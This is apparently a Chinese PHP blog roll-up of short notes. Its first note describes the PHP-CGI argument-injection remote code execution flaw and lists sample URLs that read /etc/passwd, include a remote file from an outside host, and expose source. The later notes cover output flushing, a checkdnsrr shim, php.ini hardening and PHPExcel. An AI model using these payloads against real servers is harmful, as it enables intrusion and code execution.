又发现了一例PHP挂载CGI的环境下,远程执行任意代码的漏洞。
主要原因是:PHP做了防范,CGI在SAPI下无法使用-r,-f等直接执行命令的参数。
例子,
http://demo.com/do.php?-dauto_prepend_file%3d/etc/passwd+-n
http://demo.com/do.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://sjolzy.cn/a.txt
http://demo.com/do.php?-s
受影响的平台:APACHE+MOD_CGI+PHP-CGI模式。
老生长谈了。。纯备忘
对于运行时间较长的PHP程序来说可能都需要即时输出内容来查看运行情况。
header(“Content-type:text/html;charset=utf-8″);
#设置执行时间不限时
set_time_limit(0);
#清除并关闭缓冲,输出到浏览器之前使用这个函数。
ob_end_clean();
#控制隐式缓冲泻出,默认off,打开时,对每个 print/echo 或者输出命令的结果都发送到浏览器。
ob_implicit_flush(1);
例,
PHP的自带checkdnsrr函数只在linux平台有效。使用惯了在window平台不能使用的话给兼容性带来麻烦。
因此写了个checkdnsrr模拟函数在window平台环境使用。
if (!function_exists('checkdnsrr
')) {
function checkdnsrr($host, $type) {
if(!empty($host) && !empty($type)) {
@exec('nslookup -type=' . escapeshellarg($type) . ' ' . escapeshellarg($host), $output);
foreach ($output as $k => $line) {
if(eregi('^' . $host, $line)) {
return true;
}
}
}
return false;
使用PHP代码实现的DDOS攻击会导致带宽被占用,变成卡B。
处理办法是:
修改php.ini文件
1) "disable_functions"改成gzinflate,默认是放空
2) ”allow_url_fopen“设为Off
3) php_sockets.dll 把这个模块打开
做Magento的订单导出Excel功能,找了这个php的excel类 :PHPExcel。
PHPExcel是强大的 MS Office Excel 文档生成类库,基于Microsoft's OpenXML ,支持普通xls,Excel2007,pdf,csv,html等
官网:http://phpexcel.codeplex.com/
比较大条的一个类库,官方最新版已经蹦到7.多M大了。找了个民间精简版1.多M的。
下面是这个PHP excel类库 的一些使用方法要点备忘。来自互联网。
//设置PHPExcel类库的include path
set_include_path('.'. PATH_SEPARATOR .
'D:\Zeal\PHP_LIBS' . PATH_SEPARATOR .
get_include_path());
/**